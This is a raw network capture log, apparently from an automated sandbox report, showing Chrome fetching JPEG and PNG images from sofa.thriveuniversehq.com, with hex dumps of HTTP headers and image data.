                                                          2023-11-27 03:23:53 UTC541INData Raw: 69 7c 9f d4 17 10 87 86 2b 81 26 f1 80 55 21 d5 41 ef 15 1e c7 92 b9 b4 95 ce 52 09 72 95 1b 30 d5 4a 71 bd be 41 f9 39 52 84 bb b3 e8 06 ee e6 d3 89 84 a9 05 96 05 2a a0 60 14 15 c4 0a 8d f4 cc d2 5a c1 c8 5e 4a 1f 09 25 56 2c 83 73 9d eb bc 0c ff 00 35 73 0f a9 25 b9 09 13 46 84 90 01 7c d0 21 03 20 40 ca ad f0 bc 85 b4 1f 31 a4 ca 5b 09 5a 3f 1c 6e ca 36 ee 53 d4 1c 2b bc b2 ab 94 a6 47 83 1b 3d 7a 22 9d 8d fd cd c5 a3 cc 55 8e c1 ba 32 e0 29 23 b3 2a 93 24 97 97 b2 c9 6b 75 0b 91 29 28 d8 b6 03 6b 03 98 51 e1 db 55 26 e5 51 20 2f e8 78 1d 3c 0a 8c b9 1c 74 61 d2 94 79 90 23 d8 63 1e a6 00 f8 08 62 b8 f4 62 2a 32 2d 55 fd 29 18 8f d3 af ff 00 b8 7e 27 c8 fb 94 55 cf d5 6c bb 0f c7 c7 df ed a2 a9 ba da 12 8a 6a 63 cc 38 12 43 06 03 42 b9 83 df 4a 18 86
                                                          Data Ascii: i|+&U!ARr0JqA9R*`Z^J%V,s5s%F|! @1[Z?n6S+G=z"U2)#*$ku)(kQU&Q /x<tay#cbb*2-U)~'Uljc8CBJ


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.549756172.67.151.1834434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:53 UTC529OUTGET /assets/images/state-farm-drake-2021.jpg HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          2023-11-27 03:23:54 UTC704INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 30 37 38 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 30 35 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 32 37 34 31 35 2d 36 30 38 39 30 32 65 34 39 35 37 35 34 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 41 63 63 65
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:54 GMTContent-Type: image/jpegContent-Length: 160789Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:05 GMTETag: "27415-608902e495754"Cache-Control: max-age=14400CF-Cache-Status: MISSAcce
                                                          2023-11-27 03:23:54 UTC665INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 46 00 00 ff e1 03 2c 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 38 38 2c 20 32 30 32 30 2f 30 37 2f 31 30 2d 32 32 3a 30 36 3a 35 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                          Data Ascii: ExifII*DuckyF,http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xm
                                                          2023-11-27 03:23:54 UTC1369INData Raw: 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 41 41 31 33 44 39 43 44 35 42 45 46 31 31 45 42 42 31 37 32 45 45 35 42 35 32 43 38 37 38 42 41 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 41 41 31 33 44 39 43 45 35 42 45 46 31 31 45 42 42 31 37 32 45 45 35 42 35 32 43 38 37 38 42 41 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 04 03 03 03 03 03 04 03 03 04 06 04 03 04 06 07 05 04 04 05 07 08 06 06 07 06 06 08 0a 08 09 09 09 09 08 0a 0a 0c
                                                          Data Ascii: DerivedFrom stRef:instanceID="xmp.iid:AA13D9CD5BEF11EBB172EE5B52C878BA" stRef:documentID="xmp.did:AA13D9CE5BEF11EBB172EE5B52C878BA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed
                                                          2023-11-27 03:23:54 UTC1369INData Raw: c9 3d aa 32 0a 6d 75 aa 9b 55 0e 6b c4 d0 d1 45 54 07 29 24 3b c5 60 d1 0b 3d a0 7b ea ea 90 b6 95 28 9c 96 1a 39 43 5c 2b 40 b7 d3 69 23 3d a2 2d d8 8a 16 8d 68 0a bf 38 8c 2c 36 96 8c 11 80 06 ab 3b bd 83 0f 5d 5a b4 06 9e b5 46 bc 94 6d 03 cf 6e d1 1b 28 28 7c 56 b6 f4 65 ac ea 22 08 01 8c 7c 16 3e 4e 89 1d 6d b8 2f 28 f2 16 16 eb 6d 13 95 36 05 b7 b4 06 67 73 1b 78 ad f4 ac 76 8a 0f 7f 4c fb 4b e6 88 47 50 00 5a e5 87 8f 52 31 17 d7 4e 63 5a 4f a7 fb 54 6d 57 a6 ab a6 3a 27 c8 d0 f7 6e 42 e5 de ba f0 90 92 d6 a3 5f 0e 89 4a 56 02 b8 81 fc 69 e0 55 e5 26 72 ad 77 f4 c7 53 4e 9f b1 6b 9e 88 9d d5 e8 19 23 63 f4 92 02 9c ae ae 96 dc 8e 26 40 7e ae 1b f8 aa b7 a2 27 74 1d a3 5c d7 9a 57 75 cb 5d 89 db 56 3c f8 f2 f1 51 92 4b c3 1b e8 37 04 23 00 67 17 74
                                                          Data Ascii: =2muUkET)$;`={(9C\+@i#=-h8,6;]ZFmn((|Ve"|>Nm/(m6gsxvLKGPZR1NcZOTmW:'nB_JViU&rwSNk#c&@~'t\Wu]V<QK7#gt
                                                          2023-11-27 03:23:54 UTC1369INData Raw: 7b 90 4b c0 79 16 1e 0f c1 1e 03 c9 d0 f0 42 57 51 97 79 0a a9 f1 3f 22 b9 02 14 dd 55 e4 61 ec a9 53 e0 7e 41 dd 6c 09 4f c4 bc 8d 4f 64 1e da 30 eb e6 aa 6a 3c 81 b7 14 e7 90 5d d3 65 5e 29 f2 1d 1d 8b 58 dd 46 a3 74 78 8f 22 a5 b0 64 83 ae da 25 35 1e 46 1d 8a 04 00 ed 7f ee 55 82 94 f4 76 11 81 a0 a5 14 f8 aa 6d 4b 16 31 83 53 ba 3c 4f ca bc 6c d8 e1 4a 6e 9f 89 79 10 31 b1 07 72 a6 aa f5 46 c8 ac af 68 e3 f2 b3 09 27 6f ac 75 5a 65 18 72 df b3 ec 6d dc 28 05 06 da 29 a7 3a 25 60 c5 41 0b 40 68 a5 36 59 dd 72 d2 6c 70 da 33 c2 9f 25 3e 27 93 72 63 e1 7e 84 7c d3 c2 4c bf 11 04 ad 31 bc 55 9e 0a a2 61 9f f9 7a c8 0a 06 e8 9e 0c 63 2c 61 8e 23 08 1e 82 29 4f 24 54 ce e6 a3 c5 5a c7 f4 b2 8b 3b ac 69 e7 44 32 d6 16 6c c4 bc 20 f3 a7 68 1a 3d 23 74 fc 60
                                                          Data Ascii: {KyBWQy?"UaS~AlOOd0j<]e^)XFtx"d%5FUvmK1S<OlJny1rFh'ouZerm():%`A@h6Yrlp3%>'rc~|L1Uazc,a#)O$TZ;iD2l h=#t`
                                                          2023-11-27 03:23:54 UTC1369INData Raw: 9c 01 32 7b c9 20 e5 13 c8 c3 a9 1b 88 22 4e a5 01 c3 ba 03 85 c7 e0 3a aa 85 54 6e f9 ef 03 87 80 c1 68 41 ba 92 ad 8f ad 0f 89 5a 48 cb 6b 86 2f 1d bc d7 f7 2e 96 62 5f 2c 8e 2e 7b cf 52 57 4f 1e ae 6d ae 53 2c 81 96 2c d3 ea 56 52 a3 af 2e 1d 37 5f 4d 12 5e 51 cd 15 2a 36 5c 48 5a 9e 24 0f da b9 f6 ae 8d 45 4d 73 c1 b4 58 e1 b7 92 22 e6 e3 95 68 56 98 65 6a 3e 59 c5 35 3a ad 23 2b 42 3e 50 ea 8a aa c2 2d 48 f6 ee 72 e7 0f 78 c9 23 71 f6 ea 2a df 9a 58 13 67 d0 1d bf dc 6d c8 5a b2 70 fa d4 6a 3c 0a cf 0b 82 32 17 77 6c 9b dd 84 7b 91 9f e1 ea 96 12 10 65 6d a6 21 b3 b0 c7 20 3a 3a 9f ec 4a c1 94 ce 3b 3d 2d 93 da e2 f1 71 6f b1 1b b8 03 fb d4 d8 bf 25 c6 07 61 f2 f1 03 19 0c 98 8a d3 62 b3 ba 65 a6 bc 96 23 ef f1 73 d9 9a fd 70 9d 9e 36 58 6d c7 87 4e
                                                          Data Ascii: 2{ "N:TnhAZHk/.b_,.{RWOmS,,VR.7_M^Q*6\HZ$EMsX"hVej>Y5:#+B>P-Hrx#q*XgmZpj<2wl{em! ::J;=-qo%abe#sp6XmN
                                                          2023-11-27 03:23:54 UTC1369INData Raw: 07 4d 0e 9d 53 0e d4 27 03 b5 4c 3c 08 d7 54 13 84 a6 97 13 0e 84 40 50 dd 50 2a a1 30 82 b4 23 db 6f c1 7a 55 c8 39 a7 cd 40 2c bb d2 80 1d ee 34 40 21 af ae c5 00 f4 64 a0 0b 61 a8 a9 40 3c d3 a0 4c 1c 3f b5 01 e2 3c 34 a7 8a 02 17 b9 1a e3 89 b9 35 af a5 4d 0c a4 e8 10 a5 67 35 53 a7 9a 9a 10 5e d5 6a 90 38 c8 a8 28 80 99 c2 8a 38 ad 22 2a fd 63 fe 83 51 b3 3a 93 b6 15 22 aa 49 2f 06 8d 41 23 73 46 81 87 74 a9 88 c5 54 b1 30 9a 6c 7a 55 2a 9a 8c c8 30 7b 8d f1 4a 10 1b c6 8f 70 78 51 59 0d b1 6f f2 47 c5 25 0c 0d 01 3c 95 2c 1e 9e 09 80 b7 6d 73 47 26 1d 6b 54 aa f5 ee aa f7 8c cf 8a c2 39 ab 42 d7 03 5f 81 5c dc 91 e9 fa fd c1 5b f7 9e 6a 08 23 0d 98 70 0d 00 29 9a ab 96 48 2a 3f c8 d9 86 1f 50 6b db b6 ea f1 5c c3 ac bf 25 5f c9 20 85 f0 ea 76 a1 47
                                                          Data Ascii: MS'L<T@PP*0#ozU9@,4@!da@<L?<45Mg5S^j8(8"*cQ:"I/A#sFtT0lzU*0{JpxQYoG%<,msG&kT9B_\[j#p)H*?Pk\%_ vG
                                                          2023-11-27 03:23:54 UTC1369INData Raw: b4 54 d0 05 11 d3 cd a9 37 76 57 56 cd f7 0b 0f 16 8a ad a5 71 6d 15 98 b3 d3 4f 91 6c 16 82 92 34 fe e5 bd 98 8e 4f 3c ed 88 ba 5c 5f 64 af 20 63 2e 89 2d 68 fa 76 6d 57 3d ae cd 20 31 14 86 29 01 07 51 a2 35 bd 55 bc e8 90 ec 2c a4 56 73 cd 69 27 fa 92 38 86 fc d5 f2 f6 63 c5 f8 4f e5 9a 60 b8 2f 35 e2 f0 08 2b 89 d6 1d 97 2e e2 00 25 3a 25 38 cb 89 39 54 92 47 82 06 46 c7 75 25 29 cc 8f 25 34 f3 06 41 79 34 7a 89 08 25 47 53 e8 32 2c a5 c4 6e 0e 12 12 56 77 2d 24 89 38 3b 8e f1 a3 ea aa cf 6b b4 54 d2 25 2d 73 93 dc 55 a6 b4 3a 6e b9 b7 e6 b1 b6 bc 32 a2 33 76 30 b8 3e e6 9f cc 3a d5 69 c7 c9 69 ed c7 22 0a 10 05 57 66 63 9d a6 f6 ae 6e d6 d3 1b ed cb 18 73 a8 75 22 ab 1d 86 08 9a fa d2 e6 77 48 23 e2 4a 9d 79 21 5d 69 89 a2 13 9e 4d 6e a3 aa e8 9c 91
                                                          Data Ascii: T7vWVqmOl4O<\_d c.-hvmW= 1)Q5U,Vsi'8cO`/5+.%:%89TGFu%)%4Ay4z%GS2,nVw-$8;kT%-sU:n23v0>:ii"Wfcnsu"wH#Jy!]iMn
                                                          2023-11-27 03:23:54 UTC1369INData Raw: 67 e4 d2 68 5c 36 6d 97 e9 2a 2d 5c d2 8c 8f 17 21 00 87 29 bb 46 93 54 a5 8d 94 90 b8 72 75 42 e1 e4 99 ae 9d 3a 13 9c 05 96 8e 2a f8 67 54 f2 2a b0 bc 6b 5f 15 e8 61 c6 b6 e0 25 0f 85 cd 1a d0 50 05 9e c5 04 5c 4d 2c 4f a8 6d 69 d2 8b 9f a3 4c 18 39 cb 80 d2 d6 b5 ac a7 f1 6e 57 57 1f 1e 58 72 5c 19 c2 4d 6f 91 cb c7 fd 5a 4a 59 57 f9 8e 3a 0f d5 76 d9 35 9d 5c 77 35 a9 e5 7b df b6 e0 c6 b3 0d db 17 ac 75 c9 a4 65 d1 6a c8 c9 d2 ad ae e5 73 6f 8d e6 35 98 1a db 1b 86 22 0b 48 bb 36 1b 38 2d db 28 16 7c 4c 00 0f e6 3c b3 5f fd e2 95 e2 bf 5e 24 ea e6 b9 f3 cb e2 8e ef b3 a4 97 31 4d 17 09 9a e7 07 33 c0 83 b2 f4 78 7a 45 6f ae 55 1c 55 a5 c5 b4 6e 92 46 10 d2 6a 01 f0 5b db 92 d3 5c 22 f2 97 42 e2 5e 0c 14 a1 a1 5b 71 49 23 1e 5b d7 0b 36 06 d9 c6 cc 3d
                                                          Data Ascii: gh\6m*-\!)FTruB:*gT*k_a%P\M,OmiL9nWWXr\MoZJYW:v5\w5{uejso5"H68-(|L<_^$1M3xzEoUUnFj[\"B^[qI#[6=
                                                          2023-11-27 03:23:54 UTC1369INData Raw: 2f f3 9d 1e f5 e8 b0 e5 ec 7c 73 aa db f6 ec 90 12 e6 e8 02 f2 be cb e5 87 7f 84 c2 93 7b 6b 77 75 9a fb 4b 72 19 15 75 27 aa fa 3e 2e 9a 65 e3 ef 3c b6 58 af b0 c6 db 1c 23 84 03 21 1e a2 16 33 6b 6a ac c2 8f 6f 6f 3d 9d d3 e4 00 b5 ed 3c aa bb 63 93 68 d8 bb 3b f3 cd ee 17 1c 71 57 f1 1b 8e 02 90 48 ed db e4 9c 95 cf 59 de 77 28 dc ae 42 7b d7 fd 57 0f 32 3b c3 d4 6a ba 26 bf 03 24 d9 c5 0d cc 4e 61 a1 01 67 b5 b1 7a f5 51 af ad 6d d9 7c f6 1d cb 8d 17 47 1d e8 e5 e5 9d 56 3c 28 6b 22 f6 9a 74 d7 f6 ae 7e 5b 9a ea e2 bd 02 77 14 67 ec dc 00 d4 6c a7 4e ed b6 ec a3 b6 5a ee 68 42 ea f1 72 e4 f4 73 d7 42 51 75 54 d8 4b 26 1b 55 67 85 e5 c3 28 06 b5 46 15 2b af bb 2f 8e 87 5a 27 ac ea 8d b7 02 f7 b5 c5 6f 18 53 2e 6a a6 78 11 6b 56 9a 0e a8 18 58 f1 ef 11
                                                          Data Ascii: /|s{kwuKru'>.e<X#!3kjoo=<ch;qWHYw(B{W2;j&$NagzQm|GV<(k"t~[wglNZhBrsBQuTK&Ug(F+/Z'oS.jxkVX


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.549758172.67.151.1834434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:53 UTC502OUTGET /people/1.jpg HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          2023-11-27 03:23:53 UTC704INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 33 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 33 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 37 38 64 2d 36 30 38 39 30 32 66 63 34 64 62 33 64 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 34 34 39 32
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:53 GMTContent-Type: image/jpegContent-Length: 1933Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:30 GMTETag: "78d-608902fc4db3d"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 4492
                                                          2023-11-27 03:23:53 UTC665INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 06 04 04 04 05 04 06 05 05 06 09 06 05 06 09 0b 08 06 06 08 0b 0c 0a 0a 0b 0a 0a 0c 10 0c 0c 0c 0c 0c 0c 10 0c 0e 0f 10 0f 0e 0c 13 13 14 14 13 13 1c 1b 1b 1b 1c 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 01 07 07 07 0d 0c 0d 18 10 10 18 1a 15 11 15 1a 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f ff c0 00 11 08 00 32 00 32 03 01 11 00 02 11 01 03 11 01 ff c4 00 99 00 00 03 01 00 03 00 00 00 00 00 00 00 00 00 00 00 05 06 07 04 00 03 08 01 00 03 01 01 01 00 00 00 00 00
                                                          Data Ascii: ExifII*Ducky<Adobed22
                                                          2023-11-27 03:23:53 UTC1268INData Raw: 08 3e aa 1f ed c6 a6 f8 9f 25 c8 47 b8 79 a2 3b be dd 37 df 17 71 0d 2a 67 ba 64 ee e4 40 c9 81 1f 47 3c 02 19 3d 83 c0 23 4f 19 de 7c d6 bd ba ce b7 c2 78 d9 25 78 23 75 bc 75 8b 5b c5 95 16 46 25 80 35 07 26 19 8f 41 c6 64 97 db fa 5c 63 2e b2 1b 38 ef a4 9e 00 55 1a dc 03 5d 46 87 b8 49 2d 5e 4a 53 d9 e9 c1 03 f6 df 55 82 dd d5 08 37 de 5b 97 d7 4b e1 e8 e2 39 7e 4e 18 ed b7 40 83 bd da a6 0e 91 da 5b a9 77 b6 9a fd 99 ad c1 0a d4 34 05 bb 07 b0 61 2e 54 bd a6 86 b7 29 ee 24 7d d7 17 3b 01 3b f5 8f e5 d6 df 6b b7 5b 49 b2 9f 76 f0 ab fb e5 03 50 7c b8 95 e0 4e 15 8f 92 41 f7 5d 37 2f 19 a4 7b 6d 45 31 db 76 96 9e fe 4b 59 e4 f7 2a ca 1d a5 0a cd 40 0e 4e 34 03 4f 6e 29 3e 60 1b 51 75 32 38 09 71 06 c9 ce 4e 86 df 6c e1 db b7 3b a7 9a ee 3b fb 6a 3c e6
                                                          Data Ascii: >%Gy;7q*gd@G<=#O|x%x#uu[F%5&Ad\c.8U]FI-^JSU7[K9~N@[w4a.T)$};;k[IvP|NA]7/{mE1vKY*@N4On)>`Qu28qNl;;j<


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.549757172.67.151.1834434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:53 UTC538OUTGET /utils/banners/images/2023-months/2023-11.png?v=1 HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          2023-11-27 03:23:53 UTC699INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 36 30 33 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 35 39 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 38 63 62 65 2d 36 30 38 39 30 33 31 38 61 38 37 37 36 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 34 32 34
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:53 GMTContent-Type: image/pngContent-Length: 36030Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:59 GMTETag: "8cbe-60890318a8776"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 424
                                                          2023-11-27 03:23:53 UTC670INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 06 00 00 00 79 7d 8e 75 00 00 00 01 73 52 47 42 01 d9 c9 2c 7f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 8c 63 49 44 41 54 78 9c ec bd 09 98 15 d5 b5 f6 9f ff f7 dd 38 e1 18 63 d4 ab 44 c1 38 44 44 0d 11 01 c5 1b 05 fc cb 15 65 bc 7a a3 0c f1 22 82 c6 28 83 1a 15 71 16 e7 38 c5 79 8a f3 10 35 1a 15 e7 31 8e a8 28 8a 03 ce b3 a8 71 8c 89 9a ab b1 be fd 5b 7b af 5d bb ea 54 d5 a9 d3 03 a7 81 5a cf 53 4f 37 4d f7 e9 3a d5 b5 df 5a 6b ed 77 bd ef f7 ae 5a eb e7 d1 22 7f fc 64 13 39 ae d6 63 ed 9e d1 d5 eb 70 f4 92 e3 8f eb f6 f6 87 fd 5a 4f fb 3d 1c ee 67 e5 68 f6 fb e8 c8 87 5e 5b 77 5d ff b8 5e ef e8 9a f5 fb 98 63 f3 e8 9a 6e 7d ed c1 e7 e6 6b fc 9f 5c e7
                                                          Data Ascii: PNGIHDR,,y}usRGB,pHYscIDATx8cD8DDez"(q8y51(q[{]TZSO7M:ZkwZ"d9cpZO=gh^[w]^cn}k\
                                                          2023-11-27 03:23:53 UTC1369INData Raw: d7 2a 83 5d a4 8e 41 cb fc 20 ba ac 4b 8f e3 bf 17 46 b3 4f 6a be 1e 41 bf 4a 9e f8 f4 52 a4 3c e9 2f c0 c3 13 7f c6 36 3b 08 30 dd b1 c3 d8 e8 ae 9d 77 8f ee 19 b3 67 74 ef ff ec 6d 8f 5d f6 8a ee 1e fd eb e8 ce 5f 8e 8f 6e 1f b6 8b 5d 5c 66 e1 fd 79 8b ed 04 ec e2 8c a0 8f 2d 11 17 d5 c5 95 2e b7 cd f5 a0 cc 26 23 15 b0 1a 30 42 ae f1 9d ff bd 5b f4 c5 3b ef 45 c4 37 5f 7e 15 3d 76 f8 09 d1 5d 3b 8d 8f 6e 1b 3a 26 9a 61 1e 0a 80 96 5c 57 1e 06 e6 6f b5 48 5f d3 45 e8 b8 d8 94 80 17 ac b9 51 b4 fb 8a ab 1f f7 bd 74 34 fb e4 e6 eb 91 c8 ac 36 b7 4f 7c 16 d1 66 83 24 63 ba 75 bb 91 d1 1d 3b 8e 8d ee 19 bd 67 74 df 6e 53 a2 27 8f ff 7d f4 d6 9d f7 47 9f bf f6 a6 1c 1f 3e f9 74 f4 da 8d b7 46 0f ef 7b 68 74 ef d8 89 02 68 64 05 64 5c 80 dd 0d bd 07 4a 49 49
                                                          Data Ascii: *]A KFOjAJR</6;0wgtm]_n]\fy-.&#0B[;E7_~=v];n:&a\WoH_EQt46O|f$cu;gtnS'}G>tF{hthdd\JII
                                                          2023-11-27 03:23:53 UTC1369INData Raw: bd da c0 95 dd 00 d6 36 3b 48 8f f0 8b 77 e7 35 0e 58 93 2d 60 d9 0c b5 02 ac 85 e5 d8 ca 94 81 97 75 e9 d1 72 b0 5a a4 00 8b 0c cb dc f8 3c b1 6f db 7e 54 e1 2e 15 01 58 01 52 0f ec b9 bf 34 80 d9 b1 22 6b 7a 70 af 03 a3 47 f6 3f 42 40 ab 28 d3 02 d8 f8 5e 61 c2 ef 30 36 31 77 98 09 5c 1d 59 e9 21 0d 50 c1 e8 8d 0a 1c c6 44 d1 fe 16 b0 4c 49 48 0f 4a 1a ee f3 6a 7b 58 79 01 dd c1 f6 b0 26 ca c6 88 f4 b0 7a 55 3d ac 05 f9 a0 0c fc 7d e7 6e d1 11 ab ae 7d 40 ab c0 6a a1 01 ac ac 05 95 9e 67 73 94 06 d9 bd 82 d2 f0 df bb 45 73 2f bb 26 73 d1 cc 7b e4 71 d9 86 a7 79 2e c3 ce e6 7b d9 b1 62 fe 8d ac 81 45 f8 e8 d4 e9 85 a0 47 a6 f0 e8 81 47 09 f7 88 06 32 3f 2b 73 87 e6 77 a7 81 eb 5a 37 dc db 21 47 79 c2 eb 19 00 94 68 87 85 22 87 4e 8c 4f a4 79 36 73 03 ce
